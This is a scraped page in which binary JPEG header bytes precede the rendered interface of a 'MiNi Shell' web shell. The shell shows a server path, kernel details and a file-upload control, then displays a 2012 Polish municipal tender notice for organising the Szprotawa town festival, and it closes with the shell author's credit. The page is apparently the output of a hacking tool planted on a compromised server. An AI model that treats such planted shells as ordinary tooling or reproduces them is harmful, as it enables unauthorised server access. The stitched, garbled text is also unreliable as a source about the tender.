JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120222/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120222/42613-N-2012.html

<p class="kh_header"><b>Szprotawa: Organizacja imprezy  Dni Szprotawy 2012 pod względem artystycznym, kulturalnym, rekreacyjnym oraz zapewnienia zaplecza gastronomicznego, technicznego, sanitarnego, medycznego, urządzeń  rekreacyjnych  i ochrony</b><br>
<b>Numer ogłoszenia: 42613 - 2012; data zamieszczenia: 22.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Szprotawa , Rynek 45, 67-300 Szprotawa, woj. lubuskie, tel. 068 3760772, faks 68 3762220.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja imprezy  Dni Szprotawy 2012 pod względem artystycznym, kulturalnym, rekreacyjnym oraz zapewnienia zaplecza gastronomicznego, technicznego, sanitarnego, medycznego, urządzeń  rekreacyjnych  i ochrony.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2. Zakres przedmiotu zamówienia
Przedmiotem zamówienia  jest organizacja i realizacja imprezy masowej DNI SZPROTAWY 2012 pod względem artystycznym, kulturalnym, rekreacyjnym oraz zapewnienia zaplecza gastronomicznego, technicznego, sanitarnego, medycznego, urządzeń  rekreacyjnych  i ochrony,  w dniach:
- 25.05.2012r (piątek) od godz. 18:00 do godz.01:00 dnia następnego. Wykonawca przygotuje całą infrastrukturę tj. zapewnienie zaplecza gastronomicznego, technicznego, sanitarnego, medycznego, urządzeń  rekreacyjnych i ochrony. Całość programu artystycznego w tym dniu przygotowuje Zamawiający na własny koszt . Wykonawca udostępni Zamawiającemu scenę wraz z przygotowanym nagłośnieniem i obsługą konferansjerską w godz. od 18:00 do 01:00. 
   
- 26 maja 2012r. (sobota) Program artystyczny w godz. od 16:00 do 18:00 przygotuje Zamawiający na własny koszt . Wykonawca udostępni Zamawiającemu scenę wraz z przygotowanym nagłośnieniem i obsługą konferansjerską w godz. od 16:00 do 18:00. 
 Od godziny 18.00, do godz. 02:00 dnia następnego. Całość programu artystycznego w  tych godzinach przygotowuje Wykonawca z zastrzeżeniem punktu B niniejszego opisu przedmiotu zamówienia.
- 27 maja 2012 (niedziela), od godz.17.00 do godziny 22.00, Całość programu artystycznego w  tych godzinach przygotowuje Wykonawca z zastrzeżeniem punktu B  niniejszego opisu przedmiotu zamówienia.

Przewidywana ilość  uczestników imprezy ok.  1500 - 2000 osób. 

Zakres usług stanowiących przedmiot zamówienia obejmuje:

A. Zorganizowanie zaplecza cateringowego (nie wchodzi w zakres dodatkowych atrakcji):
1. Zorganizowanie cateringu na terenie wskazanym przez Zamawiającego w postaci przygotowania dobrej jakości wyboru menu (grill, fast food, itp.), napojów chłodzących oraz gorących w okresie od 25.05.2012r od godz. 17:00 do 27.05.2012r do godz. 22:00.
2. Posiadanie odpowiedniej liczby sprzętu umożliwiającego sprawne przygotowywanie 
i podawanie posiłków (m.in. kuchnie, grille, stoły cateringowe, przyczepy gastronomiczne, chłodnie - min 5 stoisk - w okresie od 25.05.2012r od godz. 17:00 do 27.05.2012r do godz. 22:00.
3. Zapewnienie sprzedaży piwa schłodzonego i napojów chłodzących ( łącznie min 10 stoisk), organizacja ogródków piwnych, parasoli, stołów biesiadnych, zapewnienie miejsc siedzących dla min 300 osób - w okresie od 25.05.2012r od godz. 17:00 do 27.05.2012r do godz. 22:00.
4. Zapewnienie sprawnej i fachowej kadry do obsługi w liczbie odpowiedniej do liczby uczestników imprezy, łącznie z ochroną własnego obiektu- w okresie od 25.05.2012r od godz. 17:00 do 27.05.2012r do godz. 22:00.
5. Spełnienie wymogów określonych w przepisach sanitarnych;
6. Przywrócenie po zakończeniu imprezy do stanu poprzedniego terenu, na którym odbywała się usługa;

B. Organizacja i realizacja DNI SZPROTAWY 2012  pod względem artystycznym, kulturalnym, rekreacyjnym oraz zapewnienia zaplecza technicznego i urządzeń  rekreacyjnych:

Przygotowanie programu całej imprezy pod względem artystycznym, kulturalno - rekreacyjnym. Program winien zawierać m.in.
1 Opracowanie  programu całej imprezy wraz z harmonogramem czasowym. Poszczególne pozycje programu należy szczegółowo opisać. W programie imprezy należy uwzględnić występ min. 5 zespołów w tym dwie Gwiazdy Wieczoru i trzy Gwiazdy Poprzedzające Gwiazdę Wieczoru (nie wchodzi w zakres dodatkowych atrakcji).  Gwiazdę wieczoru należy wybrać spośród propozycji  Zamawiającego tj: 
-sobota: (Harlem,) 
-Niedziela : (Papa Dance, UK Legends, Elektryczne Gitary,  ,Big Cyc, Kasia Wilk Pezet, KASA)
W Programie należy uwzględnić np.:, zabawy dla dzieci oraz dodatkowe atrakcje zaproponowane przez Wykonawcę. Atrakcje dodatkowe należy w programie wykonanym przez Wykonawcę zaznaczyć zapiskiem - Atrakcja dodatkowa. Każda atrakcja dodatkowa będzie punktowana przez Zamawiającego ( szczegóły w dalszej części SIWZ - Opis sposobu obliczenia ceny). Zamawiający uzna za Atrakcję dodatkową pokaz ,przedstawienie ,występ nie krótszy niż 20 min. Zamawiający wymaga aby na koniec imprezy tj. w  niedzielę 27.05.2012r o godz. 22:00 przeprowadzony został min. 5  minutowy pokaz sztucznych ogni. (nie wchodzi w zakres dodatkowych atrakcji) 

Program imprezy należy opracować dla następujących ram czasowych tj: 

- 25.05.2012r (piątek) od godz. 18:00 do godz.0:1 dnia następnego, (Wykonawca przygotuje całą infrastrukturę tj. zapewnienie zaplecza gastronomicznego, technicznego, sanitarnego, medycznego, urządzeń  rekreacyjnych i ochrony, Całość programu artystycznego w tym dniu przygotowuje Zamawiający na własny koszt . Wykonawca udostępni Zamawiającemu scenę wraz z przygotowanym nagłośnieniem i obsługą konferansjerską w godz. od 18:00 do 01:00. 
   
- 26 maja 2012r. (sobota) Program artystyczny w godz. od 16:00 do 18:00 przygotuje Zamawiający na własny koszt . Wykonawca udostępni Zamawiającemu scenę wraz z przygotowanym nagłośnieniem i obsługą konferansjerską w godz. od 16:00 do 18:00. 
 Od godziny 16.00, do godz. 2:00 dnia następnego. Całość programu artystycznego w  tych godzinach przygotowuje Wykonawca z zastrzeżeniem punktu B niniejszego opisu przedmiotu zamówienia.

- 27 maja 2012 (niedziela), od godz.17.00 do godziny 22.00, Całość programu artystycznego w  tych godzinach przygotowuje Wykonawca z zastrzeżeniem punktu B niniejszego opisu przedmiotu zamówienia.

Program imprezy dołączyć jako załącznik nr 1 do oferty.


C.  Realizacja występów Gwiazd oraz imprez towarzyszących powinna obejmować: 
1.    Zorganizowanie całości występów artystów 
2. Wykonawca zobowiązany jest zapewnić występy artystyczne zespołów i gwiazd  (przez gwiazdy Zamawiający  rozumie wykonawców o ugruntowanej pozycji artystycznej, medialnej i rozpoznawalności); oprawę artystyczną i  konferansjerka na scenie przez cały czas trwania imprezy .
3. Do obowiązków Wykonawcy należy przygotowanie wniosku na organizację imprezy  zgodnie z wymogami ustawy o bezpieczeństwie imprez masowych, zawarcie umów z artystami i opłacenie kosztów koncertów artystycznych na scenie  wraz z rozliczeniem z tytułu tantiem autorskich (ZAIKS), zapewnieniem noclegów, wyżywienia, i innych wymagań przez nich określonych (garderób z wyposażeniem dla artystów) zorganizowanie dyskoteki po koncertach gwiazd, organizacja  innych atrakcji adresowanych do odbiorców wszystkich grup wiekowych, umożliwiających  czynny udział w nich mieszkańców i gości .
4.Wykonawca udostępni emitowanie materiałów Zamawiającego na telebimie w czasie trwania imprezy ( materiały zostaną dostarczone Wykonawcy  na 7 dni przed rozpoczęciem imprezy.
5. Wykonawca umożliwi Zamawiającemu nagranie materiału promocyjnego Video z przebiegu imprezy.

6. Zapewnienie zaplecza i techniki estradowej zgodnie z wymaganiami zaproponowanych  zespołów i artystów  estradowych w tym w szczególności: 
-	sceny i telebimu wraz z techniką estradową oświetleniem, nagłośnieniem, Wykonawca udostępni scenę , nagłośnienie , oprawę konferansjerską w czasie występów zespołów szkolnych i lokalnych we wskazanych wyżej terminach (nie wchodzi w zakres dodatkowych atrakcji).
-	profesjonalnych płotków do zabezpieczenia  sceny oraz pozostałej części terenu imprezy stosownie do odpowiednich przepisów bezpieczeństwa
-	zapewnienie akustyków, oraz w przypadku wystąpienia takiej konieczności, specjalistów z  odpowiednimi pozwoleniami lub licencjami na cały okres trwania  imprezy lub w wyznaczonych  godzinach (nie wchodzi w zakres dodatkowych atrakcji).

7. Zapewnienie urządzeń rekreacyjnych: 
-	organizacja wesołego miasteczka dla dorosłych i dla dzieci przez cały okres trwania imprezy (nie wchodzi w zakres dodatkowych atrakcji)
-	dmuchane atrakcje dla dzieci, (nie wchodzi w zakres dodatkowych atrakcji)
Urządzenia winny mieć aktualne certyfikaty sprawności i bezpieczeństwa. 
Korzystanie z urządzeń może  być odpłatne. 

8. Zapewnienie ochrony w postaci firmy ochroniarskiej adekwatnie do liczny uczestników 
w rozumieniu ustawy o bezpieczeństwie imprezy masowej 

9. Bezpieczeństwo, porządek i higiena
Zabezpieczenie odpowiedniej ilości  toalet przenośnych  ( min 10 szt.) w tym przystosowanych dla osób   niepełnosprawnych i dwie z umywalkami/, ich lokalizacja w ilości odpowiadającej potrzebom, uzgodniona z Zamawiającym. Toalety  będą opróżniane w  miarę potrzeby. Wykonawca zapewni opiekę medyczną  w czasie trwania imprezy, powiadomi  służby policji, straży pożarnej oraz służby sanepidu o terminie i wielkości imprezy, oraz uzyska wymagane pozwolenia od ww. służb na organizację imprezy.

D.  Zobowiązania Zamawiającego
-Zamawiający wskaże i przekaże Wykonawcy teren na którym odbędzie się impreza Dni Szprotawy 
-Zamawiający   opracuje tymczasową organizację ruchu dla potrzeb imprezy Dni Szprotawy
-Zamawiający wskaże oraz przygotuje przyłącze energii, ujęcie wody dla potrzeb cateringu ,ujęcie wody -hydrant na potrzeby straży pożarnej. 
-Rozreklamować imprezę poprzez przygotowanie i rozwieszenie plakatów i banerów o Dniach Szprotawy.
-Koszty zużycia energii elektrycznej podczas Dni Szprotawy pokryje Zamawiający
-Zamawiający zapewni odpowiednią  liczbę koszy na śmieci i ich regularne opróżnianie .
Głównymi założeniami imprezy ma być różnorodność oferty oraz związek z elementami , które przez wiele  lat kształtowały wizerunek Gminy,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.95.20.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art.22 ust.1 pkt. 1-4 Ustawy wg wzoru na zał. nr 3 do SIWZ ;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie ostatnich trzech lat przed
upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie
wykonał usługi obejmujące organizację imprez masowych o charakterze kulturalno- rozrywkowym,
których należyte wykonanie potwierdzi dokumentami, w tym:
- co najmniej dwie usługi adresowane do co najmniej 1000 osób o wartości nie
mniejszej niż 70 tys. zł. brutto każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art.22 ust.1 pkt. 1-4 Ustawy wg wzoru na zał. nr 3 do SIWZ ;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art.22 ust.1 pkt. 1-4 Ustawy wg wzoru na zał. nr 3 do SIWZ ;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art.22 ust.1 pkt. 1-4 Ustawy wg wzoru na zał. nr 3 do SIWZ ;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Atrakcje dodatkowe - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> szprotawa.bip.pbox.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Szprotawie 
Rynek 45
67-300 Szprotawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.03.2012 godzina 12:00, miejsce: Urząd Miejski w Szprotawie 
Biuro Obsługi Klienta
Rynek 45
67-300 Szprotawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com